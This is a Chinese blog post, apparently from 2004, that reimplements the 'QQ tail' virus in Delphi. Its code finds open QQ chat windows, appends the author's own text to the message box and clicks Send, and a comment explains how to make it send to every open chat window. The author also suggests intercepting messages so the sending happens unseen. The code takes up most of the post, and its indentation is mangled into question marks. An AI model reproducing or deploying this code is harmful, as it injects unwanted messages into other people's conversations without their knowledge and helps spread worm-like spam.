QQ尾巴病毒的另一种实现

原创 2004年05月10日 12:16:00

前几天看到?wuqiu 兄 把 QQ尾巴病毒模拟了一遍,

我觉得通过查找窗体标题,不太合常理

回去用SPY++来查看了一下,原来,QQ的框架是这样的

无法显示

?

其中,#32770(对话框)就是弹出的QQ聊天界面;内部的控件就如上图显示的那样,有Static(标签)、Button(按钮)、AfxWnd42(这个我猜类似panel的容器)、RICHEDIT(这里面就是显示我们的聊天纪录了)

具体的布局就不一一的细说了,你们可以自己打开SPY++看看,一目了然

其中,我们用到的只是其中两个控件,如下图:

前半部分是句柄,中间是标题,后半部分是类名

如:05240258~发送(&S)~Button

就是发送按钮,句柄是05240258

好了,知道了这些,想做点什么就很简单了

全部代码如下:

?

Procedure TForm1.Timer1Timer(Sender: TObject);
Var
?? hMemo, hRichEdit, HWindow, HButton: THandle; //句柄变量
?? szText?????????? : Array[0..255] Of char;?? //得到的字符串
?? MyText?????????? : String;? //发送的字符串
Begin
?? HWindow := 0;//从零开始,即从第一个字窗体开始遍历查找

?? While true Do
????? Begin

???????? //找是#32770(对话框)的窗体
???????? HWindow := FindWindowEx(0, HWindow, '#32770', Nil);
???????? If HWindow <> 0 Then
??????????? Begin

????????????? //找是AfxWnd42(这个我猜类似panel的容器)的窗体
?????????????? hMemo := FindWindowEx(HWindow, 0, 'AfxWnd42', Nil);
?????????????? If hMemo <> 0 Then
????????????????? Begin

???????????????? ???//找是RICHEDIT的窗体
???????????????????? hRichEdit := FindWindowEx(hMemo, 0, 'RichEdit', Nil);
???????????????????? If hRichEdit <> 0 Then
??????????????????????? Begin

???????????????????????? //想些什么随便啦,嘿嘿
?????????????????????????? MyText := '?????????? 阿德是个大帅哥,嘿嘿';

????????????????????????? //发消息,得到QQ中的文本
?????????????????????????? SendMessage(hRichEdit, WM_GetTEXT, 256,
????????????????????????????? integer(@szText[0]));

??????????????????????????//加上自己的话
?????????????????????????? MyText := szText + MyText;

????????????????????????? //再发给QQ
?????????????????????????? SendMessage(hRichEdit, WM_SETTEXT, 256,
????????????????????????????? integer(MyText));

????????????????????????? //找到发送按钮
?????????????????????????? HButton := FindWindowEx(HWindow, 0, 'Button',
????????????????????????????? '发送(&S)');

????????????????????????? //发点击消息,发送
?????????????????????????? SendMessage(HButton, BM_CLICK, 0, 0);

????????????????????????? //退出,如果去掉这句,就是给所有打开的QQ窗体发

????????????????????????? //否则,只发给最前面的QQ窗体
?????????????????????????? break;
??????????????????????? End;
????????????????? End;
??????????? End;
????? End;
End;

?

这也只是对QQ尾巴的一种猜测,程序有很多不尽如人意的地方,比如发的文本在QQ中显示一下然后再发送,就如?wuqiu 兄 的文章里说的,只要对消息进行拦截,然后再背地里偷偷的发送,就会神不知鬼不觉了

?

火绒回应拦截腾讯程序:QQ推广产品和病毒行为一致|腾讯:全部下线

问题:我怎么才能收到你们公众号平台的推送文章呢?答案:只需要点击标题下面的蓝色字【web前端开发】关注即可。12 月 25 日晚间消息,近日,有用户表示,安全软件火绒腾讯官方程序进行报毒、自动拦截等处...
  • snsHL9db69ccu1aIKl9r
  • snsHL9db69ccu1aIKl9r
  • 2017年12月26日 00:00
  • 568

勒索病毒工作原理

前些天借着Windows上的”永恒之蓝“漏洞,本来几乎快销声匿迹的加密勒索病毒又重新回到了公众视线里。由于电信等网络运营商早就封堵了可能导致中毒的445端口,所以外网影响不大,但是教育网里的同学就遭殃...
  • qmickecs
  • qmickecs
  • 2017年05月22日 13:48
  • 3067

病毒木马查杀实战第019篇:病毒特征码查杀之编程实现

一、前言上次我们已经简单介绍过了病毒特征码提取的基本方法,那么这次我们就通过编程来实现对于病毒的特征码查杀。 二、定义特征码存储结构为了简单起见,这次我们使用的是setup.exe以及unpacked...
  • ioio_jy
  • ioio_jy
  • 2016年04月20日 14:32
  • 12773

病毒木马查杀实战第021篇:Ring3层主动防御之编程实现

前言       我们这次会依据上次的内容,编程实现一个Ring3层的简单的主动防御软件。整个程序使用MFC实现,程序开始监控时,会将DLL程序注入到explorer.exe进程中,这样每当有新的进程...
  • ioio_jy
  • ioio_jy
  • 2016年04月20日 15:16
  • 11976

自定义微博小尾巴(源码+解析)

自定义微博小尾巴(源码+解析) 简单三步, 壕无压力。 想怎么变就怎么变。 来自 全球限量版iPhone 6 plus plus...
  • hitwhylz
  • hitwhylz
  • 2014年09月22日 07:59
  • 13439

bzoj3307 雨天的尾巴

树链剖分+线段树,思路很棒!
  • AaronGZK
  • AaronGZK
  • 2016年02月05日 12:07
  • 1251

一个简单的PE感染病毒

/------- 通过开辟一个新的节表放置shellcode 修改PE入口点到shellcode,并在shellcode中设置返回原PE入口点 PE文件格式参考资料: http://bbs.pe...
  • GVFDBDF
  • GVFDBDF
  • 2015年09月22日 23:05
  • 1037

【bzoj3307】雨天的尾巴 线段树+树链剖分

考虑如果在序列上的话,每次只需要在区间左端点+1,右端点-1,最后用线段树一起统计即可。 在树上的话,就用树链剖分转换成序列,每一次操作,对应修改O(log n)条重链上的标记,最后用线段树来统计。...
  • u012288458
  • u012288458
  • 2016年04月14日 09:12
  • 386

PE 文件型病毒编写实验(一)

这个学期终于圆了当年来读渣电的网络安全专业的一个梦:PE病毒编写。想起了高中那会儿熬夜看看雪论坛瞎搞什么软件破解,可是搞到后面很多东西不理解做的不深入,所以就先一本心思的考上渣电,然后再来深入的学习一...
  • jmh1996
  • jmh1996
  • 2017年11月09日 21:11
  • 159

Android----病毒查杀原理及应用

今天看到一篇帖子,是关于病毒查杀的问题,那片帖子写的很详细,将原理都讲述出来了,后来根据帖子的代码自己实例验证了一下,发现是可行的,所以,现在就记录一下学习的过程。(此文有借鉴的地方,关键是大家能学到...
  • xuewater
  • xuewater
  • 2013年11月04日 10:33
  • 1134
内容举报
返回顶部
收藏助手
不良信息举报
您举报文章:QQ尾巴病毒的另一种实现
举报原因:
原因补充:

(最多只允许输入30个字)